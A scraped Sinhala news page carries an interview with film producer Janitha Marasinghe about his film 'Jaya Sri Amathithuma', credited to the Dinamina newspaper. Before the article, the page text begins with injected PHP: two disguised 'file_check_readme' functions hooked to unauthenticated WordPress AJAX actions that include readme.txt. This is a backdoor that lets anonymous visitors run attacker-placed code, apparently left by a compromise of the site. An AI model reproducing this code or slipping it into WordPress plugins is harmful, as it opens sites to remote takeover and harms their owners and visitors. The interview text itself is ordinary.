if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } මම අලුත් වැඩක් පත්තු කරන්න සූදානම් - mediahumanrights.lk
mediahumanrights.lk
Entertainment Entertainment News News

මම අලුත් වැඩක් පත්තු කරන්න සූදානම්

ලේකිරි කඳුළු, රන් කෙවිට, මගෝඩි ගොඩයි, ඇඩ්‍රස් නෑ ඇතුළු තවත් සිනමා කෘති රැසක් නිෂ්පාදනය කළ ප්‍රවීණ චිත්‍රපට නිෂ්පාදක ජනිත මාරසිංහ ගේ නවතම සිනමා නිර්මාණය වූ “ජය ශ්‍රී ඇමැතිතුමා” මේ දිනවල දිවයින පුරා සිනමාහල් රැසක තිරගත වේ. එහි නවතම තතු පිළිබඳ කතාබහකට පසුගිය දවසක ඔහු අප හා එකතු වුණා.

‘ජය ශ්‍රී ඇමතිතුමාට‘ ලැබෙන ප්‍රතිචාර ජයයිද?

ඇත්තටම ඔව්. එය දැනට පවතින සමාජ ක්‍රමයත් එකක් හැදුණු එක්තරා ආරක චිත්‍රපටයක්.

‘ජය ශ්‍රී ඇමතිතුමාට‘ රංගනයෙන් දායකවන ශ්‍රියන්ත මෙන්ඩිස් පුරවන්නේ විජය නන්දසිරිගේ හිඩැසද?

ඔහු එක්තරා පුවත්පතකට පවසා තිබුණා විජය නන්දසිරි ජීවත්ව සිටියා නම් මෙය ඔහුට ලැබෙන්න තිබුණු චරිතයක් කියලා. විජය නන්දසිරි මිය ගියාට පසුවයි අපි මේ චිත්‍රපටය පටන් ගත්තේ. ඒ නිසා අපේ හිතේ එවැනි අදහසක් තිබුණේ නැහැ. අපි මෙහි කතා බහ පටන් ගත්තේම ශ්‍රියන්ත මෙන්ඩිස් ටාර්ගට් කරගෙනයි.

විජයගේ අඩුව ඔබට දැනෙන්නේ කොහොමද?

අවංකවම විජය නන්දසිරි කියන රංගවේදියා එක්කෙනයි. ඔහුව ප්‍රතිනිර්මාණය කරන්න මෑත කාලීනව තවත් කෙනකුට පුළුවන් වේවි යැයි මම හිතන්නේ නැහැ.

ඉහළ ප්‍රේක්ෂක ප්‍රතිචාර ලබමින් මේ දිනවල තිරගත වන චිත්‍රපට සමඟ කොහොමද ‘ජය ශ්‍රී ඇමතිතුමා‘ තරග කරන්නේ?

සිනමාව තුළ හැමදාමත් තරගකාරීත්වය තිබුණා. ඒ තරගකාරීත්වය බෙහෙවින්ම බලපාන්නේ දේශීය චිත්‍රපටවලට වඩා විදේශීය චිත්‍රපට එක්කයි. ඉස්සර දේශීය චිත්‍රපට සහ විදේශීය චිත්‍රපටවලට වෙන් වූ සිනමා ශාලා තිබුණත් දැන් එහෙම නැහැ.

චිත්‍රපට ශාලා හිමියෝ චිත්‍රපටයක ධාවන කාලය තීරණය කරන්නේ ඒ චිත්‍රපටයට තිබෙන ජනප්‍රියත්වය අනුවයි. ඉතින් මේ චිත්‍රපටය බෙදාහැරපු මණ්ඩලයට අයත් සිනමා ශාලාවලින් ලැබුණු තිර කාලය තවම මට ඒ විදිහටම ලැබෙනවා. මේ චිත්‍රපටය නරඹන්න බලන් ඉන්න ප්‍රේක්ෂකයෝ අනිවාර්යයෙන්ම සිනමා ශාලාවට එනවා.

ඔබ වැනි ව්‍යාපාරිකයන් සිනමාවේ නියැළෙන්නේ ලාභ ලබන්නද නැතිනම් වෙනත් වරප්‍රසාද අපේක්ෂාවෙන්ද?

සිනමාවට තියෙන කැමැත්ත සහ ආදරය මගේ පවුල් ආභාසයෙන් ඇවිත් ඇඟේම තිබෙන දෙයක්. ඒ තියෙන කැමැත්ත සහ ආදරය එක්ක මම ඉන්නේ චිත්‍රපටයක් සාර්ථකව කර ගෙන යෑමේ උත්සාහයක. චිත්‍රපට ප්‍රේක්ෂකාගාරය කලින් කලට වෙනස් වෙනවා. මීට වසර දහයකට කලින් බොක්ස් ඔෆිස් වාර්තා තැබු චිත්‍රපටයක් අපි ප්‍රති නිර්මාණය කළොත් ඒ ආදායම හෝ ඒ ජනප්‍රියත්වය පෙර විදිහටම ලැබෙන්නේ නැහැ.

නමුත් චිත්‍රපටයක ටාගට් මාකට් එක, එය ප්‍රදර්ශනය කෙරෙන කාල වකවානුව සහ නියමිත ධාවන කාලය, චිත්‍රපටය හැම නගරයකම ප්‍රදර්ශනය කිරීම සඳහා බෙදා හැරීමේ ක්‍රමවේදය සහ ඒ චිත්‍රපටයේ ප්‍රචාරණ කටයුතු යන මේ සියල්ල පිළිබඳ නිවැරැදි අවබෝධයකින් චිත්‍රපට නිර්මාණකරණයේ නියැළෙනවා නම් එවැනි චිත්‍රපට අසාර්ථක වෙන්න හේතුවකුත් නැහැ.

ඒ කියන්නේ ඔබේ හැම නිර්මාණයක්ම සාර්ථකයි කියලද?

ඔව්. සමස්තයක් වශයෙන් සාර්ථකයි. නැත්නම් මට මෙතෙක් රැඳෙන්න බැහැ. මට අවශ්‍ය සාර්ථකව රැඳෙමින් ඉස්සරහට යන්න මිසක් කරන්නම් වාලේ චිත්‍රපට කරලා මගේ ලිස්ට් එකට අසාර්ථක චිත්‍රපට ගොඩක් එකතු කර ගන්න නෙමෙයි.

විනෝදාත්මක හෝ ළමා නිර්මාණවලටයි ඔබ සිනමාවේ වැඩිපුර දායකත්වය සපයා තිබෙන්නේ ?

මුලින්ම මම සම නිෂ්පාදනයෙන් එක් වුණේ ‘ලේ කිරි කඳුළු‘ සමඟයි. මගේ නිෂ්පාදනයක් වූ ‘ඇඩ්‍රස් නැහැ‘, සම නිෂ්පාදනය කළ ‘කුස පබා‘ යන මේ සියල්ල එකිනෙකට වෙනස් වූ සිනමා කෘති. මම හිතන්නේ මා හැම පැත්තම නියෝජනය කර තිබෙනවා.

ඔබේ නිර්මාණ ගැන බිරියගේ ප්‍රතිචාර කොහොමද?

මගේ නිර්මාණවල හොඳ හෝ නරක ගැන මුල්ම අවංක ප්‍රතිචාරය ලැබෙන්නේ ගෙදරින් තමයි.

ඊළඟ නිර්මාණ මීට වෙනස් වේවිද?

මේ වෙලාවේ වස්තු දෙක තුනක් මගේ ඔළුවේ සැලසුම් කරගෙන යමිනුයි ඉන්නේ.

එහෙත් තවම මම මහන්සි වෙන්නේ මේ චිත්‍රපටයේ ප්‍රදර්ශන කාර්ය සහ එයට අදාළ වැඩ කටයුතු එක්ක. එයින් මිදිලා විවේකයක් ලැබුණු ගමන්ම අලුත් වැඩක් පත්තු කරන්න මම සූදානම්.
( උපුටා ගැනීම දිනමිණ පුවත් පත ඇසුරෙනි)

Related posts

මැතිවරණය ගැන කැබිනට් මණ්ඩලයට විශේෂ සන්දේශයක්

Shiran Viraj

මධ්‍යස්ථාන 12ක් තුළ පුද්ගලයින් 1311ක් නිරෝධායනයට

Shiran Viraj

බැඩ්මින්ටන් ශූර නිලූක කරුණාරත්නට කොරෝනා

Shiran Viraj